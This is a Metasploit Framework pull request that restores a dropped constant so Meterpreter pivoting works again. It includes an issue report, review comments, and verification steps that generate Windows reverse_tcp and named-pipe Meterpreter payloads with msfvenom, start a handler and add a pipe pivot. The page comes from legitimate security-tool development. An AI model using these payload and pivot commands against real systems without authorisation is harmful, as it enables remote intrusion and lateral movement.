### PR TITLE
Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error 

### LINKED ISSUE #14026: Pivot erroring out after update
metasploit v6.0.2-dev- 
windows/x64/meterpreter/reverse_http
lport=8080
lhost=10.8.0.x (vpn)

meterpreter > pivot add -t pipe -l 192.168.152.101 -n mypipe -a x64 -p windows
[-] Error running command pivot: NameError uninitialized constant Rex::Post::Meterpreter::Pivot::TLV_TYPE_PIVOT_STAGE_DATA_SIZE

Same result for other machines on the vpn net as well

### PR DESCRIPTION
**Pull request by adfoster-r7**
closes https://github.com/rapid7/metasploit-framework/issues/14026 which outputs the following error:

```
msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > pivot add -t pipe -l 192.168.222.155 -n mypipe -a x64 -p windows
[-] Error running command pivot: NameError uninitialized constant Rex::Post::Meterpreter::Pivot::TLV_TYPE_PIVOT_STAGE_DATA_SIZE
```

It looks like the constant got dropped here:
https://github.com/rapid7/metasploit-framework/commit/6170f497b6680e15a258a5f3a1ed42c1faf26a68#diff-b6b57a795784299fed803cb61b764866L123

And:
https://github.com/rapid7/metasploit-payloads/pull/397/files#diff-a2ad02e5970082b154c6d31771aa4477L763-R766

From inspection it looks like this TLV packet is no longer needed.

## Verification

Generate reverse tcp payload:

```
bundle exec ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.1 LPORT=4444 -o reverse_shell.exe -f exe -a x64
```

Create listener:

```
use multi/handler
set payload payload/windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.1
set LPORT 4444
run
````

OR:

```
use payload/windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.1
set LPORT 4444
to_handler
````

Create the pipe:

```
sessions -i -1
pivot add -t pipe -l 192.168.222.155 -n mypipe -a x64 -p windows
```

Ensure the pivot was created successfully:

```
meterpreter > pivot list

Currently active pivot listeners
================================

    Id                                URL                            Stage
    --                                ---                            -----
    c134bb9f27dc4089b2f56b3ad25c4970  pipe://192.168.222.155/mypipe  x64/windows


```

Generate the reverse_named_pipe payload:e

```
bundle exec ./msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=192.168.222.155 PIPENAME=mypipe -o pipe.exe -f exe -a x64
```

Execute the payload on the target host; you should now see a session opened, run `sessions -x` on the attacker machine to verify.

You will now get a new session:

image

### CODE REVIEW

**Review by OJ — APPROVED** [review]
Looks like another case of code that disappeared during that nasty rebase, because I absolutely removed this reference! Thanks for catching this Alan.

I see this is draft, did you want me to land it?

**Comment by adfoster-r7** [comment]
Looks like there was a few more tweaks required; I've added the `COMMAND_ID_CORE_PIVOT_SESSION_NEW ` command id, and put up a metasploit-payloads PR:

https://github.com/rapid7/metasploit-payloads/pull/437

**Comment by adfoster-r7** [comment]
@OJ Pivoting looks to be working great again now - I've removed the draft status and I've got a metasploits payload PR up now too https://github.com/rapid7/metasploit-payloads/pull/437

We noticed that sending the `exit` command on the second session actually caused both the original session to quit when testing against the same machine. I verified the previous functionality of 5.0.101, and it doesn't seem like a regression to me - so this pull request seems land-able now

If nothing looks too out of place to you on the metasploit-payloads PR, I'm more than happy for our team to land this fix now :+1:

**Comment by smcintyre-r7** [comment]
I was able to both reproduce the original issue and confirm that this fixes it. See rapid7/metasploit-payloads#437 for [output](https://github.com/rapid7/metasploit-payloads/pull/437#issuecomment-704251245) [details](https://github.com/rapid7/metasploit-payloads/pull/437#issuecomment-704254558).

**Pull request merged**
